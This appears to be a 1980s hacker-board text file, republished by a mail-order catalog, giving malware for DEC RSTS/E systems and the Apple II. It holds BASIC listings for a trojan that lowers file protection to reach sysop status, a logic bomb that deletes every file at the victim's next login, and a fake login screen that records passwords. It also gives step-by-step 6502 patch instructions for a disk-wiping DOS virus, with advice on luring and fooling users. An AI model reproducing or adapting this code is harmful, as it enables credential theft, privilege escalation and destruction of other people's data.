Filename = BBSFILES.DOC



THE FOLLOWING FILES WERE DOWNLOADED BY ME IN ONE EVENING, USING AN IBM-PC AND

MODEM.  THEY WERE DOWNLOADED TO SHOW THE NATURE OF THE INFORMATION READILY

AVAILABLE TO THE THOUSANDS WHO ACCESS HACKER BOARDS - PROVIDED FOR

EDUCATIONAL PURPOSES ONLY, AND NOT TO RECOMMEND OR IMPLY ANY ILLEGAL USE

WHATSOEVER.  THESE FILES JUST RELATE TO COMPUTER PHREAKING.  THERE ARE MANY

MORE ON PHONE BOXING, WEAPONRY AND EXPLOSIVES, LOCKPICKING - YOU NAME IT!

(we are very interested in increasing this file for future updates of

COMPUTER PHREAKING and, separately, adding similar files for our PHONE COLOR

BOXES, and other technical and survival topics we have interest in (see our

catalog).  If you have some good public domain info. for us, please send it

to us in an ASCII file(s), on 5.25" or 3.5" disk (use First Class Mail only),

to:  CONSUMERTRONICS, 2011 Crescent Dr., P.O.  Drawer 537, Alamogordo, NM

88310.  If you require compensation for your help, let us know in advance

what you have and w�a| yot w/u�d lik� for i�)>





D/L1------------------------------



Virus, Trojan Horse, and Decoy Programs:



DEC MAINFRAMES:

===============

    The following were devolped and tested on DEC Basic Plus, running under

the RSTS/E Operating system. All have been tested, and were sucessfully used

in the field.  However, sucessful use depends on the savvy of the sysop,

legitimate users, and illegitimate ones.  They work best on uninformed

(stupid) users and sysops, and when the hacker using them makes them

attractive, as when using trojan horses, or realistic, when using decoys.



TROJAN HORSE:

=============

     What follows is a rough listing of the business end of a typical trojan

horse program.  While this one just lowers the security of the programs on

the affected account, it could be easily modified to create another account,

or execute any other command. The key is the 'sy$=sys(chr$(14)+"....")'

statement.  In BASIC PLUS Programming language, this command lets you execute

a DCL command from within a BASIC Program.  Therefore, any DCL command, COPY,

DELETE, PIP, or even BYE could be inserted in the "...." space. I prefer

using PIP *.* <40> /RE, as what that will do is lower the protection codes

low enough for me to see the files on the account.  This works with both

sysops and non-privlidged users, so I can benefit whenever someone runs it,

as opposed to something the sysop has to run in order for it to do whatever.

As a plus, if a sysop runs it, certain hidden files on the [1,*] account he/

she's using will become visible, which will, provided you know what you're

doing, enable you to get sysop status. Of course, you could also use PIP

[*,*] *.* <40> /RE, which, if a sysop runs it, will lower the protection of

every file on the system, one would have to add an error checking routine in

case a non-sysop ran it.



10 extend

20 sy$=sys(chr$(14)+"PIP *.* <40> /RE") 30 rem the following would be the

interesting little game you've wrote which 40 rem makes the program look

atractive, and compels the hapless user to 50 rem run it.  60 end



LOGIC BOMB:

===========

     The following is an example of a simple logic bomb, which has proven to

Work very well. What it does is create a file on the effected account which

will delete all files on the account upon the next login, it also dumps the

user off the system for good measure, you could remove the logoff procedure,

and not affect program operating, but they then stand a chance of noticing

the little file you've added.



    10 extend

    20 open "login.com" as file #1

    30 print #1,"pip *.* <60> /re"

    40 print #1,"delete *.*"

    50 close #1

    60 sy$=sys(chr$(14)+"bye/f")

    70 end



     Now, line 30 is optional in this program. I have included it in case the

user has protected his files from accidental deletion.  There is one instance

in which this program won't work properly. This is when the defualt language

upon logon isn't DCL, on occasion, some systems have BASIC as the default. In

this case, just add the following line.



    25 print #1,"sw dcl"



And you'll switch to DCL before continuing to the rest of the program.



THE DECOY:

==========

     This decoy is to be used on local terminals, ones that are connected to

the system via RS-232, such as in schools. It is also the riskiest of these

programs to use. What it basicly does is wait until input, and then act as a

login program, saving the users id# and password. Upon getting it, it informs

the user of an "invalid entry" and then returns control to the system.  There

are a number of things to keep in mind when using this program. The first is

to change the program so it looks like your system.   The second is to

remember that it runs under the account it's on, therefore you take a risk of

someone hitting [Break] while it's running, and getting into your account.

Finally, due to the BASIC language, you'll only get the project number of the

account (what's before the comma). However, since you'll have the password,

you'll get it in less than 255 tries.



    10 extend

    20 open "kb:" as file #1%

    30 input #1%, z$

    40 print "RSTS v8.0-06 MICOM I Job <10> KB31:  ";date$(0);" ";time$(0)

    50 print

    60 print "Username:  ";

    70 input #1%, u$

    80 print "Password: ";

    90 sy$=sys(chr$(3))

    100 input #1%, p$

    110 sy$=sys(chr$(2))

    120 print:  print "Invalid Entry - Try Again"

    130 print:  print

    140 print "Username: ";

    150 input #1%, r$

    160 sy$=sys(chr$(3))

    170 print "Password: ";

    180 input #1%, s$

    190 sy$=sys(chr$(2))

    200 open "acct.txt" as file #2

    210 print #2,u$

    220 print #2,p$

    230 print #2,r$

    240 print #2,s$

    250 close #2

    260 print:  print "Access Denied"

    270 sy$=sys(chr$(14)+"bye/f")

    280 end



     The parts which have to be changed are line 40, and the number of tries

it allows before logging you off. The system I used for devolpment allowed

only two tries, and most I've seen only allow two, but, it isn't always that

way.  Finally, remember to save ALL input, for reasons which should be

obvious.



FREE MEMORY:

============

     While this program isn't classified as a trojan horse, decoy, logic

bomb, or virus. It's quite interesting, and I've decided to include it.  This

program enables you to look at unallocated space on the system's disk.  It's

very useful when the sysop is creating and deleting accounts, and in schools

in order to yank deleted files, which happens when students are modifying

programs.



    10 open "free.mem" as file #1%

    20 put #1%, record nnnnn%

    30 close #1%



GENERAL NOTES ON PC VIRUSES

===========================

     Writing "funny programs" on PCs is a big pain-in-the-a__.  There are two

major reasons why.  The first is that most users know their PCs(Personal

Computers in general, not just IBM) like the back of their hand, and that any

wierdness would be immediately noticed, unlike a big multiuser system, where

there are amoungst other users, and basicly isolated in their own little

section of RAM.  Secondly,  they have to be extremly small, as to be hidden

effectively.  While one can write the perfict virus with 64k, try writting

one in a few bytes of space.  Personally, I feel the best way to screw over a

computer user is to put a magnet to his disks, but if you want to do it the

hard way, it is possible.



APPLE II+, //e. //c:

====================

     The Apple series of computers is one of the simplest machines to

"infect", so to speak. Perhaps this is because it creator was a prima donna

hacker, but who knows. DOS 3.3 has several unsed spots in it, which are

adequete to hide a virus in. They are (in hex) $B78D-$B792 and $BCDF-$BCFF.

You can also, on pre-1983 versions of DOS 3.3, use BA69-BA93. There are also

some spots which aren't unused, but are used for such DOS commands such as

VERIFY, LOCK, UNLOCK, CHAIN, and MAXFILES.  The classic virus program on the

Apple a machine language program which counts how many times someone does a

certain function, such as CATALOG, LOAD, or SAVE, and upon reaching a certain

number, initializes the disk. It is based in DOS memory, which means that

once the affected disk is booted, it stays in the machine until power down,

and can affect any disk which is used with said machine. It will also be

transfered to any disk which is initalized by the machine. The actual program

is very simple, provided you know 6502 machine language. What you do is make

a patch to the Command handler entry point for the Catalog command. The

location for the command handler is from $9D1E to $9D55.  Look around in

there until you find a string which says "6EA5" this is the entry point for

the Catalog Handler, which is $A56E. Remember that.  Change it to the

beginning of your "modification". I recommend $BCDF, since it is the bigest

stretch of memory which is truly safe.  You then write a program which will

do an LDX (Load X Register) from a memory location where you're counter is,

say $B78D. You compare that memory to the number of times you want the

command to go through before deletion, say 20 hex. (CPA $20) if the number of

times is greater than the the number in the Compare statement ($20) then jump

to the init subroutine (BPL $4F5A)(The INIT start location is $5A4F), if not,

then Increment the X Register by 1 (INX $01), store it (STX $8DB7), you then

continue with your program by Cataloging the disk (JMP $6EA5).  End of

program.  I have found this to be one of the best virus programs, as these

things go.





D/L2---------------------------------------